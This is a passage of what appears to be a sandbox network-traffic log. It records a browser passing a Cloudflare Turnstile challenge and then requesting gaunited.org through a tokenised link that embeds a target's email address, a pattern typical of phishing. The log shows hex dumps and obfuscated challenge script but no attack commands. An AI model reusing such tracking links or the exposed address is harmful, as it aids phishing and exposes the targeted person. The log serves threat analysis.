3(1561)],i3(1e3))&&d[i3(369)](clearInterval,fz)}),fB=![],!f3(gH(830))&&(g0(),setInterval(function(iG,d,e,f,g){iG=gH,d={},d[iG(987)]=iG(1474),d[iG(1221)]=iG(282),e=d,f=eM[iG(337)][iG(360)]\|\|1e4,g=fY(),!eM[iG(1150)]&&!fC()&&!eM[iG(1195)][iG(897)]&&g-fX>f?fi
2024-07-09 18:52:17 UTC	1369	IN	Data Raw: 56 47 69 59 45 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 45 6c 6a 44 69 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 66 6b 56 75 58 27 3a 69 49 28 35 32 30 29 2c 27 54 44 52 66 52 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 44 71 55 5a 62 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 78 4c 4e 50 71 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 58 6d 62 4c 5a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 55 4b 63 72 58 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d Data Ascii: VGiYE':function(h,i){return h>i},'EljDi':function(h,i){return h<<i},'fkVuX':iI(520),'TDRfR':function(h,i){return h-i},'DqUZb':function(h,i){return h(i)},'xLNPq':function(h,i){return i==h},'XmbLZ':function(h,i){return h<<i},'UKcrX':function(h,i){return i==
2024-07-09 18:52:17 UTC	1369	IN	Data Raw: 32 32 34 29 5d 5b 69 4c 28 32 38 31 29 5d 28 52 2c 27 2a 27 29 29 7d 29 3b 65 6c 73 65 20 69 66 28 4e 3d 6a 5b 69 4b 28 38 38 36 29 5d 28 4d 29 2c 4f 62 6a 65 63 74 5b 69 4b 28 36 30 32 29 5d 5b 69 4b 28 35 37 31 29 5d 5b 69 4b 28 31 34 39 38 29 5d 28 44 2c 4e 29 7c 7c 28 44 5b 4e 5d 3d 48 2b 2b 2c 45 5b 4e 5d 3d 21 30 29 2c 4f 3d 46 2b 4e 2c 4f 62 6a 65 63 74 5b 69 4b 28 36 30 32 29 5d 5b 69 4b 28 35 37 31 29 5d 5b 69 4b 28 31 34 39 38 29 5d 28 44 2c 4f 29 29 46 3d 4f 3b 65 6c 73 65 7b 69 66 28 4f 62 6a 65 63 74 5b 69 4b 28 36 30 32 29 5d 5b 69 4b 28 35 37 31 29 5d 5b 69 4b 28 31 34 39 38 29 5d 28 45 2c 46 29 29 7b 69 66 28 32 35 36 3e 46 5b 69 4b 28 31 31 31 35 29 5d 28 30 29 29 7b 66 6f 72 28 43 3d 30 3b 43 3c 49 3b 4b 3c 3c 3d 31 2c 4c 3d 3d 6f 2d 31 Data Ascii: 224)][iL(281)](R,'*'))});else if(N=j[iK(886)](M),Object[iK(602)][iK(571)][iK(1498)](D,N)\|\|(D[N]=H++,E[N]=!0),O=F+N,Object[iK(602)][iK(571)][iK(1498)](D,O))F=O;else{if(Object[iK(602)][iK(571)][iK(1498)](E,F)){if(256>F[iK(1115)](0)){for(C=0;C<I;K<<=1,L==o-1
2024-07-09 18:52:17 UTC	1369	IN	Data Raw: 73 2e 68 5b 55 5e 74 68 69 73 2e 67 5d 3d 54 2c 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 31 38 37 5d 5b 69 4b 28 37 35 37 29 5d 28 53 5b 69 4b 28 33 36 36 29 5d 28 29 29 3b 65 6c 73 65 7b 66 6f 72 28 50 3d 31 2c 43 3d 30 3b 64 5b 69 4b 28 36 32 33 29 5d 28 43 2c 49 29 3b 4b 3d 50 7c 4b 3c 3c 31 2c 6f 2d 31 3d 3d 4c 3f 28 4c 3d 30 2c 4a 5b 69 4b 28 31 33 38 36 29 5d 28 73 28 4b 29 29 2c 4b 3d 30 29 3a 4c 2b 2b 2c 50 3d 30 2c 43 2b 2b 29 3b 66 6f 72 28 50 3d 46 5b 69 4b 28 31 31 31 35 29 5d 28 30 29 2c 43 3d 30 3b 31 36 3e 43 3b 4b 3d 64 5b 69 4b 28 33 39 33 29 5d 28 4b 2c 31 29 7c 31 26 50 2c 4c 3d 3d 64 5b 69 4b 28 38 33 32 29 5d 28 6f 2c 31 29 3f 28 4c 3d 30 2c 4a 5b 69 4b 28 31 33 38 36 29 5d 28 73 28 4b 29 29 2c 4b 3d 30 29 3a 4c 2b 2b 2c 50 3e 3e 3d Data Ascii: s.h[U^this.g]=T,this.h[this.g^187][iK(757)](S[iK(366)]());else{for(P=1,C=0;d[iK(623)](C,I);K=P\|K<<1,o-1==L?(L=0,J[iK(1386)](s(K)),K=0):L++,P=0,C++);for(P=F[iK(1115)](0),C=0;16>C;K=d[iK(393)](K,1)\|1&P,L==d[iK(832)](o,1)?(L=0,J[iK(1386)](s(K)),K=0):L++,P>>=

Timestamp	Bytes transferred	Direction	Data
2024-07-09 18:52:16 UTC	791	OUT	GET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/a6jpw/0x4AAAAAAAeIDT3Zcm3iJj6N/auto/normal/auto/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-09 18:52:17 UTC	240	IN	HTTP/1.1 200 OK Date: Tue, 09 Jul 2024 18:52:17 GMT Content-Type: image/png Content-Length: 61 Connection: close cache-control: max-age=2629800, public Server: cloudflare CF-RAY: 8a0a829ea960427c-EWR alt-svc: h3=":443"; ma=86400
2024-07-09 18:52:17 UTC	61	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: PNGIHDRsIDAT$IENDB`

Timestamp	Bytes transferred	Direction	Data
2024-07-09 18:52:17 UTC	922	OUT	POST /cdn-cgi/challenge-platform/h/b/flow/ov1/1568611667:1720549685:hcITSD1snsn-aMiu0_StB7Gg7A55WhOph7Ykxs_VGMc/8a0a82987970c32e/97aa2a1169caae0 HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive Content-Length: 2841 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Content-type: application/x-www-form-urlencoded sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 CF-Challenge: 97aa2a1169caae0 sec-ch-ua-platform: "Windows" Accept: / Origin: https://challenges.cloudflare.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/a6jpw/0x4AAAAAAAeIDT3Zcm3iJj6N/auto/normal/auto/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-09 18:52:17 UTC	2841	OUT	Data Raw: 76 5f 38 61 30 61 38 32 39 38 37 39 37 30 63 33 32 65 3d 37 47 52 35 58 35 78 35 4e 35 62 35 6e 79 6b 34 79 6b 66 35 79 45 58 51 38 4e 79 77 51 79 62 62 6b 36 48 6b 58 55 35 58 31 6b 5a 35 77 6f 30 58 5a 64 52 6b 44 6c 55 24 70 37 72 35 25 32 62 61 6b 4a 35 49 52 2b 4c 2b 24 54 4a 67 6b 6d 54 35 79 6a 6b 4b 55 6b 5a 64 6b 6b 70 72 6b 63 35 6b 6d 6b 54 35 77 6d 6b 77 30 2d 34 72 6b 52 44 45 58 2d 6b 4c 6d 73 52 6b 43 6b 58 30 6b 38 4c 67 53 6c 43 67 35 52 66 69 31 35 42 55 6b 32 51 6b 49 66 7a 6f 77 69 56 4c 6d 4f 79 45 39 39 67 6b 37 54 53 63 67 63 4e 6b 51 55 6b 4a 7a 4b 53 31 58 79 35 6b 55 55 6b 39 6c 69 39 7a 6d 6b 6b 43 6b 4c 67 63 38 6b 6b 65 6b 79 4b 4c 4c 7a 24 52 77 75 64 6b 76 55 35 4b 7a 61 32 6b 4a 66 35 6e 4a 63 47 51 38 64 56 48 42 6e 75 59 Data Ascii: v_8a0a82987970c32e=7GR5X5x5N5b5nyk4ykf5yEXQ8NywQybbk6HkXU5X1kZ5wo0XZdRkDlU$p7r5%2bakJ5IR+L+$TJgkmT5yjkKUkZdkkprkc5kmkT5wmkw0-4rkRDEX-kLmsRkCkX0k8LgSlCg5Rfi15BUk2QkIfzowiVLmOyE99gk7TScgcNkQUkJzKS1Xy5kUUk9li9zmkkCkLgc8kkekyKLLz$RwudkvU5Kza2kJf5nJcGQ8dVHBnuY
2024-07-09 18:52:18 UTC	731	IN	HTTP/1.1 200 OK Date: Tue, 09 Jul 2024 18:52:18 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 125936 Connection: close cf-chl-gen: Uc9K7qbmSBQlNRfd043qzflB/uw223GHFQ5OMuSUudreh0EAQNcRNnCawkQUjbTvEvUVx2t99KXlUjxL1lG080pNsNrI+lCtKwlVD0yTCX43TtLw3yXU4gBVgDk/vVIJM7eWDdI/HzAW6Fzv6yBgQLxZh7LWEZ3CQlU+4LB32bjR3yH5EbBFrXSkXSMXc2Y+i4UTSUSrefrk3d3BMhJmHoXrrzuxnJpvuOQbk9rKBxGmP5094KMmqwjrAm1Xc+iDD5USWab6ky5Osbx5kM7T1jwkSaa/vJt2I58UKR4+iqHs21RDZtU+DbsVuZrnMki/ep3cne7QWTIYO21ggmG+nC/C4waG6NI9fOK1SfMxH5bpRHDUg3CidEimoaU1QKMzAw7yMee+K1jFwd9hQYdIfB1VwJfjIEGgYd1PbXRYIpLK1suymUcgW3I17pMNxqObxaiEGTBObEzXhTXoAGaAiHzUTcDxYA==$Ne6hCm3fQPV9GjUF Server: cloudflare CF-RAY: 8a0a82a4aba142aa-EWR alt-svc: h3=":443"; ma=86400
2024-07-09 18:52:18 UTC	638	IN	Data Raw: 73 70 6d 72 69 5a 43 30 65 62 69 73 75 4b 53 62 75 58 72 45 6f 62 6d 62 72 6f 66 43 68 35 2f 46 73 71 79 70 79 4c 2b 6e 79 4e 66 4b 71 39 66 55 34 4d 47 38 32 37 36 30 74 37 72 58 70 4c 65 38 32 65 54 4b 32 37 66 77 33 63 48 53 77 38 2f 47 79 65 4b 79 32 4c 69 30 30 38 76 75 75 2f 6e 4c 38 2f 72 53 78 66 62 70 30 2f 33 72 35 4f 45 45 38 4f 34 4a 79 41 45 46 44 2b 73 49 37 68 58 76 44 78 4d 57 38 51 38 58 47 76 4d 57 39 67 4d 59 37 79 67 65 42 51 73 67 4b 67 6b 50 4a 51 38 69 4a 69 6b 48 4d 69 41 6a 38 67 33 34 38 7a 30 33 4d 2f 76 7a 47 7a 63 37 45 7a 73 63 4b 42 4e 4b 4a 45 4d 39 4f 52 67 51 4c 42 39 50 53 68 5a 51 56 6b 67 69 52 6c 67 72 4d 6b 34 75 55 46 52 56 4e 57 52 64 51 54 64 59 4b 53 4d 35 59 6d 41 68 4a 6e 46 78 51 45 68 4e 52 30 70 76 52 32 6f Data Ascii: spmriZC0ebisuKSbuXrEobmbrofCh5/FsqypyL+nyNfKq9fU4MG82760t7rXpLe82eTK27fw3cHSw8/GyeKy2Li008vuu/nL8/rSxfbp0/3r5OEE8O4JyAEFD+sI7hXvDxMW8Q8XGvMW9gMY7ygeBQsgKgkPJQ8iJikHMiAj8g348z03M/vzGzc7EzscKBNKJEM9ORgQLB9PShZQVkgiRlgrMk4uUFRVNWRdQTdYKSM5YmAhJnFxQEhNR0pvR2o
2024-07-09 18:52:18 UTC	1369	IN	Data Raw: 5a 38 56 5a 4a 57 6d 58 56 73 6c 59 78 2f 70 35 47 69 66 49 61 64 6c 6c 39 36 71 61 64 35 6b 6f 71 63 66 37 53 76 6a 70 64 73 6d 57 36 70 6e 5a 36 71 6b 59 75 6a 64 70 65 42 6b 4c 71 39 6f 36 4f 6e 75 38 47 63 72 4d 4f 45 76 70 79 74 76 74 69 73 77 71 4f 71 6c 36 75 70 7a 37 72 64 76 38 75 68 75 64 62 47 70 63 50 44 71 4f 4f 2b 35 2b 44 4d 34 4e 48 55 33 50 54 49 78 75 61 34 37 4d 50 4a 75 65 2f 72 39 76 7a 64 38 50 33 65 33 76 7a 65 43 37 7a 56 32 39 33 6e 43 4d 62 76 41 2b 66 4d 35 41 66 68 45 39 62 78 42 64 4d 4d 2f 68 37 61 46 2f 66 2b 32 39 66 63 42 77 51 63 39 79 72 6e 39 75 51 50 43 43 55 42 45 50 4d 57 38 67 77 79 4d 67 37 78 4b 77 6e 2b 4e 52 41 41 47 6a 67 33 47 45 67 49 4f 69 6f 61 52 6b 4e 4a 44 67 67 61 49 67 55 4f 4b 79 6f 7a 53 54 67 52 4b Data Ascii: Z8VZJWmXVslYx/p5GifIadll96qad5koqcf7SvjpdsmW6pnZ6qkYujdpeBkLq9o6Onu8GcrMOEvpytvtiswqOql6upz7rdv8uhudbGpcPDqOO+5+DM4NHU3PTIxua47MPJue/r9vzd8P3e3vzeC7zV293nCMbvA+fM5AfhE9bxBdMM/h7aF/f+29fcBwQc9yrn9uQPCCUBEPMW8gwyMg7xKwn+NRAAGjg3GEgIOioaRkNJDggaIgUOKyozSTgRK
2024-07-09 18:52:18 UTC	1369	IN	Data Raw: 57 67 58 79 51 64 61 4b 58 6d 5a 79 48 6d 48 69 58 6b 4a 43 6f 72 34 47 79 72 61 4e 75 62 37 69 74 64 62 79 63 6c 37 32 79 73 36 47 7a 6e 37 2b 78 6c 71 4b 33 79 4d 53 70 77 49 32 36 72 34 76 45 71 64 4c 46 74 4d 2b 76 74 73 32 7a 7a 73 7a 61 33 72 2f 50 77 38 2b 79 78 74 7a 6a 76 39 79 6c 70 4c 76 63 33 2b 69 2b 34 36 37 42 39 62 37 44 72 38 62 44 36 64 72 62 79 62 58 79 79 4d 33 53 38 64 76 77 2b 51 50 6f 35 64 54 32 39 75 77 46 7a 42 48 75 45 4f 48 47 7a 50 37 55 30 74 45 47 44 74 50 37 42 77 34 43 2f 52 54 74 34 51 55 43 4a 74 72 33 42 2f 4d 62 47 41 67 4a 36 2b 73 41 48 2f 51 6f 4c 67 6e 34 4c 41 77 6b 48 43 73 4f 50 42 6f 31 4f 45 41 4f 48 51 49 56 43 54 63 63 4c 51 73 37 49 44 77 63 52 55 68 50 46 55 4d 66 47 43 51 53 45 79 5a 56 56 56 39 57 4b 7a Data Ascii: WgXyQdaKXmZyHmHiXkJCor4GyraNub7itdbycl72ys6Gzn7+xlqK3yMSpwI26r4vEqdLFtM+vts2zzsza3r/Pw8+yxtzjv9ylpLvc3+i+467B9b7Dr8bD6drbybXyyM3S8dvw+QPo5dT29uwFzBHuEOHGzP7U0tEGDtP7Bw4C/RTt4QUCJtr3B/MbGAgJ6+sAH/QoLgn4LAwkHCsOPBo1OEAOHQIVCTccLQs7IDwcRUhPFUMfGCQSEyZVVV9WKz
2024-07-09 18:52:18 UTC	1369	IN	Data Raw: 5a 6f 57 69 71 47 65 73 6f 49 79 46 65 71 4f 31 74 58 52 77 65 4c 70 35 73 49 2b 47 68 6e 79 4f 6f 70 57 72 6e 38 4f 61 78 5a 69 6a 6e 38 4b 73 76 71 47 6d 68 36 2b 70 30 62 54 49 6b 71 43 4b 71 36 53 74 31 4b 65 70 32 4d 43 30 72 36 33 41 6e 63 54 51 34 70 75 30 31 74 72 57 74 74 33 74 34 65 61 7a 36 74 2f 31 39 62 48 75 39 2f 72 53 75 39 66 75 38 74 48 59 31 4e 37 64 30 64 2f 62 43 39 6e 54 36 4f 44 75 41 38 6a 38 42 74 50 4f 41 65 44 66 45 52 41 4c 35 68 33 35 44 66 6f 58 47 2f 44 56 31 74 33 34 38 4e 34 41 2b 67 63 62 42 65 59 73 42 53 4d 44 41 67 6b 4e 4c 51 58 33 4b 51 6f 33 2f 43 34 79 47 50 49 37 4e 45 54 39 4f 45 67 59 4d 68 39 4d 4e 53 6b 72 43 68 6f 77 50 45 34 6b 50 52 35 53 52 54 45 53 56 42 55 61 58 42 30 61 4b 32 4d 2f 56 6b 39 65 5a 7a 49 Data Ascii: ZoWiqGesoIyFeqO1tXRweLp5sI+GhnyOopWrn8OaxZijn8KsvqGmh6+p0bTIkqCKq6St1Kep2MC0r63AncTQ4pu01trWtt3t4eaz6t/19bHu9/rSu9fu8tHY1N7d0d/bC9nT6ODuA8j8BtPOAeDfERAL5h35DfoXG/DV1t348N4A+gcbBeYsBSMDAgkNLQX3KQo3/C4yGPI7NET9OEgYMh9MNSkrChowPE4kPR5SRTESVBUaXB0aK2M/Vk9eZzI
2024-07-09 18:52:18 UTC	1369	IN	Data Raw: 6d 35 35 73 4a 4b 69 63 58 4f 6f 67 71 65 73 6a 36 69 53 73 58 70 2f 65 71 36 59 73 62 4b 39 73 49 62 47 76 34 54 47 7a 4c 61 2f 6d 71 76 46 75 36 36 4d 6c 71 48 4c 78 4c 43 35 7a 4e 44 59 77 4c 36 77 74 70 36 77 76 73 4c 49 75 35 76 67 79 4e 72 4e 33 4e 33 76 30 73 48 7a 79 74 2b 79 34 75 4c 71 32 62 61 35 36 63 79 35 32 38 37 54 37 4f 37 62 2b 2f 49 4b 38 63 54 70 32 77 41 43 2f 4e 72 4f 37 67 7a 4b 45 68 63 43 43 50 6f 55 2b 66 55 4f 33 64 7a 33 32 78 48 36 38 68 55 64 41 50 67 41 2f 68 33 69 43 68 6b 4e 42 79 62 77 43 69 6e 73 4b 41 4d 6d 42 43 51 6d 4a 78 67 65 47 66 34 72 2b 68 67 64 41 77 55 34 47 43 6b 34 47 43 67 6c 4c 41 30 61 4d 43 6c 42 51 7a 63 74 56 55 31 58 4c 44 46 50 54 46 63 5a 48 56 63 32 4f 7a 4e 63 58 53 41 6a 56 30 42 43 59 32 78 6a Data Ascii: m55sJKicXOogqesj6iSsXp/eq6YsbK9sIbGv4TGzLa/mqvFu66MlqHLxLC5zNDYwL6wtp6wvsLIu5vgyNrN3N3v0sHzyt+y4uLq2ba56cy5287T7O7b+/IK8cTp2wAC/NrO7gzKEhcCCPoU+fUO3dz32xH68hUdAPgA/h3iChkNBybwCinsKAMmBCQmJxgeGf4r+hgdAwU4GCk4GCglLA0aMClBQzctVU1XLDFPTFcZHVc2OzNcXSAjV0BCY2xj
2024-07-09 18:52:18 UTC	1369	IN	Data Raw: 53 59 63 71 69 74 63 33 61 6e 6d 37 61 30 71 35 69 42 72 72 65 64 77 73 53 46 79 72 79 4d 68 6f 32 4b 78 35 79 36 68 59 62 55 77 4d 57 6e 7a 5a 72 54 74 39 54 58 33 74 32 79 6e 72 44 42 73 73 66 69 6f 61 62 48 77 63 58 65 35 4d 32 38 33 36 6e 72 79 75 58 57 34 38 4c 6e 74 2b 58 48 36 4f 69 31 76 4d 77 41 39 4d 4c 53 7a 2b 62 44 31 41 66 47 36 64 67 4f 44 52 4c 35 2f 65 76 66 33 75 2f 33 36 65 4c 6a 35 2f 62 6d 43 2f 66 32 31 2f 76 7a 47 68 55 55 42 66 67 57 43 2b 66 70 47 79 58 72 36 78 2f 71 49 2b 6f 6d 4c 43 76 75 4c 76 54 35 4e 42 73 66 2f 42 49 7a 4f 52 6f 62 4f 54 30 65 47 54 6b 70 49 66 34 39 43 79 4a 47 47 69 49 7a 4b 43 46 47 4e 43 6b 6e 49 78 73 7a 4b 52 46 53 50 53 31 68 4e 30 55 79 56 54 51 2f 4f 43 45 6b 5a 43 5a 74 59 6b 73 6f 63 55 74 79 51 Data Ascii: SYcqitc3anm7a0q5iBrredwsSFyryMho2Kx5y6hYbUwMWnzZrTt9TX3t2ynrDBssfioabHwcXe5M2836nryuXW48Lnt+XH6Oi1vMwA9MLSz+bD1AfG6dgODRL5/evf3u/36eLj5/bmC/f21/vzGhUUBfgWC+fpGyXr6x/qI+omLCvuLvT5NBsf/BIzORobOT0eGTkpIf49CyJGGiIzKCFGNCknIxszKRFSPS1hN0UyVTQ/OCEkZCZtYksocUtyQ
2024-07-09 18:52:18 UTC	1369	IN	Data Raw: 4a 6c 4a 69 63 73 5a 65 34 75 35 61 54 75 70 32 37 69 70 71 63 6f 4d 79 46 6e 62 47 78 72 6f 71 6b 6b 4d 4b 74 69 34 79 58 74 39 43 37 75 65 48 54 34 36 48 50 33 2b 66 6b 32 65 54 6a 75 64 37 6f 72 4c 37 4a 35 73 50 6a 34 73 50 4f 30 4e 50 34 36 62 58 50 38 76 54 55 7a 63 72 51 32 73 2b 33 34 4d 48 35 2b 63 6a 65 44 4d 6a 6b 2f 4d 66 4d 2f 68 55 4e 30 73 38 4e 39 41 67 61 2f 42 6a 37 32 64 77 69 34 51 51 54 41 4f 58 6d 42 68 73 66 36 50 34 59 41 68 7a 33 4c 53 63 50 45 69 54 74 46 52 51 61 4a 7a 48 37 39 42 38 6e 4f 42 46 43 50 69 42 46 45 6b 41 33 4d 78 55 45 4a 78 6b 45 44 54 45 44 4f 68 4d 30 4c 53 55 56 52 7a 6b 6f 4a 45 51 37 47 46 42 62 45 31 42 43 48 54 49 63 4d 69 63 35 56 31 64 4e 61 56 6f 73 57 56 38 77 4c 6d 52 72 4d 6c 4e 59 62 58 74 77 58 47 Data Ascii: JlJicsZe4u5aTup27ipqcoMyFnbGxroqkkMKti4yXt9C7ueHT46HP3+fk2eTjud7orL7J5sPj4sPO0NP46bXP8vTUzcrQ2s+34MH5+cjeDMjk/MfM/hUN0s8N9Aga/Bj72dwi4QQTAOXmBhsf6P4YAhz3LScPEiTtFRQaJzH79B8nOBFCPiBFEkA3MxUEJxkEDTEDOhM0LSUVRzkoJEQ7GFBbE1BCHTIcMic5V1dNaVosWV8wLmRrMlNYbXtwXG
2024-07-09 18:52:18 UTC	1369	IN	Data Raw: 6e 4d 57 2b 6d 4c 6d 54 75 35 7a 42 72 5a 79 77 79 37 6e 48 71 4d 2b 2f 79 5a 48 4f 74 4a 61 31 72 4c 37 59 70 39 79 58 74 39 44 42 35 4c 69 64 74 2b 72 69 74 72 62 75 72 62 72 4e 37 2b 7a 4e 73 4f 37 78 78 73 32 78 35 4d 2b 38 31 72 37 55 32 76 72 55 30 72 38 42 30 4d 44 36 34 50 33 55 35 64 72 4e 7a 4d 4c 79 33 42 44 2b 36 77 4c 4a 43 77 2f 57 47 51 55 55 46 39 45 54 38 78 50 63 42 76 6e 36 48 66 55 70 4a 52 6a 31 48 76 30 67 49 65 38 62 4e 53 34 49 4e 43 77 31 4f 50 4d 35 4c 53 33 35 2b 44 33 38 4f 77 49 39 47 45 63 32 48 69 45 66 41 78 38 4d 50 67 31 4e 55 53 55 31 4b 52 4d 70 49 79 73 53 56 46 6c 4f 53 46 68 54 53 53 41 56 58 6b 51 79 55 6b 6b 32 4a 56 68 4c 56 6d 35 6c 4c 58 49 79 5a 46 34 73 56 45 6c 6d 57 56 5a 71 4c 6a 70 64 54 45 31 65 58 57 42 Data Ascii: nMW+mLmTu5zBrZywy7nHqM+/yZHOtJa1rL7Yp9yXt9DB5Lidt+ritrburbrN7+zNsO7xxs2x5M+81r7U2vrU0r8B0MD64P3U5drNzMLy3BD+6wLJCw/WGQUUF9ET8xPcBvn6HfUpJRj1Hv0gIe8bNS4INCw1OPM5LS35+D38OwI9GEc2HiEfAx8MPg1NUSU1KRMpIysSVFlOSFhTSSAVXkQyUkk2JVhLVm5lLXIyZF4sVElmWVZqLjpdTE1eXWB
2024-07-09 18:52:18 UTC	1369	IN	Data Raw: 70 2b 63 67 37 2b 38 76 6f 33 4d 6a 34 71 70 7a 4d 57 4b 73 4b 54 5a 6b 74 69 76 74 4c 65 39 6d 71 76 4f 75 38 61 36 30 4d 72 43 75 2b 48 63 35 4b 47 37 33 2b 36 2b 72 2f 62 4c 33 2b 54 36 2b 75 53 75 2f 62 30 42 30 67 44 73 36 37 6f 45 37 38 58 68 34 74 59 49 35 50 37 63 33 77 4d 53 42 67 49 57 36 66 44 67 36 2b 6b 62 45 2b 6a 75 44 78 6f 54 39 66 77 45 45 2f 51 44 48 75 44 37 42 76 63 69 49 68 63 45 36 69 30 6c 49 77 49 56 44 69 67 43 42 41 6f 4e 4a 78 30 67 50 51 76 34 4e 7a 49 36 4f 42 34 6c 4a 44 6f 63 49 69 77 72 52 51 30 63 51 68 73 30 4c 6b 55 76 56 78 45 34 4f 46 4e 47 55 7a 34 35 55 31 39 53 4d 44 56 6e 49 69 56 55 52 46 74 57 52 46 31 6b 62 45 70 73 62 69 38 2f 64 57 31 6b 52 55 52 57 62 55 35 4a 63 56 42 62 63 48 64 79 62 54 31 57 63 6b 64 65 Data Ascii: p+cg7+8vo3Mj4qpzMWKsKTZktivtLe9mqvOu8a60MrCu+Hc5KG73+6+r/bL3+T6+uSu/b0B0gDs67oE78Xh4tYI5P7c3wMSBgIW6fDg6+kbE+juDxoT9fwEE/QDHuD7BvciIhcE6i0lIwIVDigCBAoNJx0gPQv4NzI6OB4lJDocIiwrRQ0cQhs0LkUvVxE4OFNGUz45U19SMDVnIiVURFtWRF1kbEpsbi8/dW1kRURWbU5JcVBbcHdybT1Wckde

Timestamp	Bytes transferred	Direction	Data
2024-07-09 18:52:18 UTC	814	OUT	GET /favicon.ico HTTP/1.1 Host: gaunited.org Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://gaunited.org/?xhjvrczy=7916a6b310ba6eced760b22d1d46271e3b1540bdd0cf0f26568259caa28bcc2cc4a34477ba1ecd9bb18135b16dc936bdbe30f9b85e8f3a82522031c68449ab57&email=chigley%40live-quinn.com Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: qPdM=6EHt3yYYhEzf; qPdM.sig=hlFz_VDQY766F2hmVBZXTNSu8mc
2024-07-09 18:52:18 UTC	122	IN	HTTP/1.1 500 Internal Server Error Date: Tue, 09 Jul 2024 18:52:18 GMT Connection: close Transfer-Encoding: chunked
2024-07-09 18:52:18 UTC	33	IN	Data Raw: 31 36 0d 0a 3c 68 31 3e 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 68 31 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 16<h1>Access Denied</h1>0

Timestamp	Bytes transferred	Direction	Data
2024-07-09 18:52:18 UTC	487	OUT	GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1568611667:1720549685:hcITSD1snsn-aMiu0_StB7Gg7A55WhOph7Ykxs_VGMc/8a0a82987970c32e/97aa2a1169caae0 HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-09 18:52:19 UTC	379	IN	HTTP/1.1 404 Not Found Date: Tue, 09 Jul 2024 18:52:18 GMT Content-Type: application/json Content-Length: 7 Connection: close cf-chl-out: 8VOSPz0hl6gm4g3IG0apMEMFck5RpSJ/+xQ=$unc8+9H25llptXAG cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Server: cloudflare CF-RAY: 8a0a82aa795d421d-EWR alt-svc: h3=":443"; ma=86400
2024-07-09 18:52:19 UTC	7	IN	Data Raw: 69 6e 76 61 6c 69 64 Data Ascii: invalid

Timestamp	Bytes transferred	Direction	Data
